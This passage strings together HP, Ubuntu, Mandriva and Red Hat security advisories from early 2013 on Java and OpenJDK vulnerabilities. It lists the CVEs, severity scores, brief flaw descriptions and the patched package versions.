here:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c03714148\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c03714148\nVersion: 1\n\nHPSBUX02857 SSRT101103 rev.1 - HP-UX Running Java, Remote Unauthorized\nAccess, Disclosure of Information, and Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nReferences: CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0169,\nCVE-2013-0351, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424,\nCVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0429,\nCVE-2013-0431, CVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435,\nCVE-2013-0437, CVE-2013-0438, CVE-2013-0440, CVE-2013-0441, CVE-2013-0442,\nCVE-2013-0443, CVE-2013-0444, CVE-2013-0445, CVE-2013-0446, CVE-2013-0449,\nCVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476,\nCVE-2013-1478, CVE-2013-1480, CVE-2013-1484, CVE-2013-1485, CVE-2013-1486,\nCVE-2013-1487, CVE-2013-1489, CVE-2013-1493\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.04 and earlier\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-0169 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6\nCVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2013-0431 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-0437 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2013-0444 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-0809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-1484 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-1485 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-1486 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-1487 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-1489 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-1493 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following Java version upgrade to resolve these\nvulnerabilities. \nThe upgrade is available from the following location\n\nhttp://www.hp.com/java\n\nHP-UX B.11.23, B.11.31\n JDK and JRE v7.0.05 or subsequent\n\nMANUAL ACTIONS: Yes - Update\nFor Java v7.0 update to Java v7.0.05 or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk70.JDK70-COM\nJdk70.JDK70-DEMO\nJdk70.JDK70-IPF32\nJdk70.JDK70-IPF64\nJre70.JRE70-COM\nJre70.JRE70-IPF32\nJre70.JRE70-IPF32-HS\nJre70.JRE70-IPF64\nJre70.JRE70-IPF64-HS\naction: install revision 1.7.0.04.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 25 March 2013 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin List: A list of HP Security Bulletins, updated\nperiodically, is contained in HP Security Notice HPSN-2011-001:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c02964430\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2013 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits;damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. ============================================================================\nUbuntu Security Notice USN-1724-1\nFebruary 14, 2013\n\nopenjdk-6, openjdk-7 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.10\n- Ubuntu 12.04 LTS\n- Ubuntu 11.10\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK. \n\nSoftware Description:\n- openjdk-7: Open Source Java implementation\n- openjdk-6: Open Source Java implementation\n\nDetails:\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure and data integrity. An attacker could exploit these\nto cause a denial of service. (CVE-2012-1541, CVE-2012-3342, CVE-2013-0351,\nCVE-2013-0419, CVE-2013-0423, CVE-2013-0446, CVE-2012-3213, CVE-2013-0425,\nCVE-2013-0426, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0441,\nCVE-2013-0442, CVE-2013-0445, CVE-2013-0450, CVE-2013-1475, CVE-2013-1476,\nCVE-2013-1478, CVE-2013-1480)\n\nVulnerabilities were discovered in the OpenJDK JRE related to information\ndisclosure. (CVE-2013-0409, CVE-2013-0434, CVE-2013-0438)\n\nSeveral data integrity vulnerabilities were discovered in the OpenJDK JRE. \n(CVE-2013-0424, CVE-2013-0427, CVE-2013-0433, CVE-2013-1473)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure and data integrity. (CVE-2013-0432, CVE-2013-0435,\nCVE-2013-0443)\n\nA vulnerability was discovered in the OpenJDK JRE related to availability. \nAn attacker could exploit this to cause a denial of service. \n(CVE-2013-0440)\n\nA vulnerability was discovered in the OpenJDK JRE related to information\ndisclosure and data integrity. An attacker could exploit this to cause a\ndenial of service. (CVE-2013-0444)\n\nA data integrity vulnerability was discovered in the OpenJDK JRE. (CVE-2013-0448)\n\nAn information disclosure vulnerability was discovered in the OpenJDK JRE. (CVE-2013-0449)\n\nA vulnerability was discovered in the OpenJDK JRE related to information\ndisclosure and data integrity. An attacker could exploit this to cause a\ndenial of service. (CVE-2013-1481)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.10:\n icedtea-7-jre-jamvm 7u13-2.3.6-0ubuntu0.12.10.1\n openjdk-7-jre 7u13-2.3.6-0ubuntu0.12.10.1\n openjdk-7-jre-headless 7u13-2.3.6-0ubuntu0.12.10.1\n openjdk-7-jre-lib 7u13-2.3.6-0ubuntu0.12.10.1\n openjdk-7-jre-zero 7u13-2.3.6-0ubuntu0.12.10.1\n\nUbuntu 12.04 LTS:\n icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.12.04.2\n icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.12.04.2\n openjdk-6-jre 6b27-1.12.1-2ubuntu0.12.04.2\n openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.12.04.2\n openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.12.04.2\n openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.12.04.2\n\nUbuntu 11.10:\n icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.11.10.2\n icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.11.10.2\n openjdk-6-jre 6b27-1.12.1-2ubuntu0.11.10.2\n openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.11.10.2\n openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.11.10.2\n openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.11.10.2\n\nUbuntu 10.04 LTS:\n icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.10.04.2\n openjdk-6-jre 6b27-1.12.1-2ubuntu0.10.04.2\n openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.10.04.2\n openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.10.04.2\n openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.10.04.2\n\nThis update uses a new upstream release which includes additional bug\nfixes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2013:010\n http://www.mandriva.com/security/\n _______________________________________________________________________\n\n Package : java-1.6.0-openjdk\n Date : February 11, 2013\n Affected: 2011., Enterprise Server 5.0\n _______________________________________________________________________\n\n Problem Description:\n\n Multiple security issues were identified and fixed in OpenJDK\n (icedtea6):\n \n * S6563318, CVE-2013-0424: RMI data sanitization\n * S6664509, CVE-2013-0425: Add logging context\n * S6664528, CVE-2013-0426: Find log level matching its name or value\n given at construction time\n * S6776941: CVE-2013-0427: Improve thread pool shutdown\n * S7141694, CVE-2013-0429: Improving CORBA internals\n * S7173145: Improve in-memory representation of splashscreens\n * S7186945: Unpack200 improvement\n * S7186946: Refine unpacker resource usage\n * S7186948: Improve Swing data validation\n * S7186952, CVE-2013-0432: Improve clipboard access\n * S7186954: Improve connection performance\n * S7186957: Improve Pack200 data validation\n * S7192392, CVE-2013-0443: Better validation of client keys\n * S7192393, CVE-2013-0440: Better Checking of order of TLS Messages\n * S7192977, CVE-2013-0442: Issue in toolkit thread\n * S7197546, CVE-2013-0428: (proxy) Reflect about creating reflective\n proxies\n * S7200491: Tighten up JTable layout code\n * S7200500: Launcher better input validation\n * S7201064: Better dialogue checking\n * S7201066, CVE-2013-0441: Change modifiers on unused fields\n * S7201068, CVE-2013-0435: Better handling of UI elements\n * S7201070: Serialization to conform to protocol\n * S7201071, CVE-2013-0433: InetSocketAddress serialization issue\n * S8000210: Improve JarFile code quality\n * S8000537, CVE-2013-0450: Contextualize RequiredModelMBean class\n * S8000540, CVE-2013-1475: Improve IIOP type reuse management\n * S8000631, CVE-2013-1476: Restrict access to class constructor\n * S8001235, CVE-2013-0434: Improve JAXP HTTP handling\n * S8001242: Improve RMI HTTP conformance\n * S8001307: Modify ACC_SUPER behavior\n * S8001972, CVE-2013-1478: Improve image processing\n * S8002325, CVE-2013-1480: Improve management of images\n * Backports\n * S7010849: 5/5 Extraneous javac source/target options when building\n sa-jdi\n \n The updated packages provides icedtea6-1.11.6 which is not vulnerable\n to these issues. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niD8DBQFRGPy8mqjQ0CJFipgRAksKAJ4jLXf61F0/Cv73FU/q53MlN9XWrwCg31LS\n66EZIS1nevIB2YwYzVsWp8I=\n=bxu7\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: java-1.7.0-openjdk security update\nAdvisory ID: RHSA-2013:0247-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2013-0247.html\nIssue date: 2013-02-08\nCVE Names: CVE-2013-0424 CVE-2013-0425 CVE-2013-0426 \n CVE-2013-0427 CVE-2013-0428 CVE-2013-0429 \n CVE-2013-0431 CVE-2013-0432 CVE-2013-0433 \n CVE-2013-0434 CVE-2013-0435 CVE-2013-0440 \n CVE-2013-0441 CVE-2013-0442 CVE-2013-0443 \n CVE-2013-0444 CVE-2013-0445 CVE-2013-0450 \n CVE-2013-1475 CVE-2013-1476 CVE-2013-1478 \n CVE-2013-1480 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.7.0-openjdk packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 5 and 6. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux (v. 5 server) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64\n\n3. Description:\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit. \n\nMultiple improper permission check issues were discovered in the AWT,\nCORBA, JMX, Libraries, and Beans components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-0442, CVE-2013-0445, CVE-2013-0441, CVE-2013-1475,\nCVE-2013-1476, CVE-2013-0429, CVE-2013-0450, CVE-2013-0425, CVE-2013-0426,\nCVE-2013-0428, CVE-2013-0444)\n\nMultiple flaws were found in the way image parsers in the 2D and AWT\ncomponents handled image raster parameters. A specially-crafted image could\ncause Java Virtual Machine memory corruption and, possibly, lead to\narbitrary code execution with the virtual machine privileges. \n(CVE-2013-1478, CVE-2013-1480)\n\nA flaw was found in the AWT component\u0027s clipboard handling code. An\nuntrusted Java application or applet could use this flaw to access\nclipboard data, bypassing Java sandbox restrictions. (CVE-2013-0432)\n\nThe default Java security properties configuration did not restrict access\nto certain com.sun.xml.internal packages. An untrusted Java application or\napplet could use this flaw to access information, bypassing certain Java\nsandbox restrictions. This update lists the whole package as restricted. \n(CVE-2013-0435)\n\nMultiple improper permission check issues were discovered in the JMX,\nLibraries, Networking, and JAXP components. An untrusted Java application\nor applet could use these flaws to bypass certain Java sandbox\nrestrictions. (CVE-2013-0431, CVE-2013-0427, CVE-2013-0433, CVE-2013-0434)\n\nIt was discovered that the RMI component\u0027s CGIHandler class used user\ninputs in error messages without any sanitization. An attacker could use\nthis flaw to perform a cross-site scripting (XSS) attack. (CVE-2013-0424)\n\nIt was discovered that the SSL/TLS implementation in the JSSE component\ndid not properly enforce handshake message ordering, allowing an unlimited\nnumber of handshake restarts. A remote attacker could use this flaw to\nmake an SSL/TLS server using JSSE consume an excessive amount of CPU by\ncontinuously restarting the handshake. (CVE-2013-0440)\n\nIt was discovered that the JSSE component did not properly validate\nDiffie-Hellman public keys. An SSL/TLS client could possibly use this flaw\nto perform a small subgroup attack. (CVE-2013-0443)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.5. Refer to\nthe NEWS file, linked to in the References, for further information. \n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/knowledge/articles/11258\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)\n860652 - CVE-2013-1475 OpenJDK: IIOP type reuse sandbox bypass (CORBA, 8000540, SE-2012-01 Issue 50)\n906447 - CVE-2013-0431 OpenJDK: JMX Introspector missing package access check (JMX, 8000539, SE-2012-01 Issue 52)\n906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)\n906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)\n906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)\n906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)\n906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)\n906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)\n906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)\n907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)\n907218 - CVE-2013-0444 OpenJDK: MethodFinder insufficient checks for cached results (Beans, 7200493)\n907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)\n907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)\n907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)\n907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)\n907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)\n907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)\n907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)\n907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)\n907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)\n907460 - CVE-2013-0429 OpenJDK: PresentationManager incorrectly shared (CORBA, 7141694)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 5 client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.i386.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.i386.rpm\njava-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.i386.rpm\njava-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.i386.rpm\njava-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.i386.rpm\njava-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.i386.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\njava-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.i386.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.i386.rpm\njava-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.i386.rpm\njava-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.i386.rpm\njava-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.i386.rpm\njava-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.i386.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\njava-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 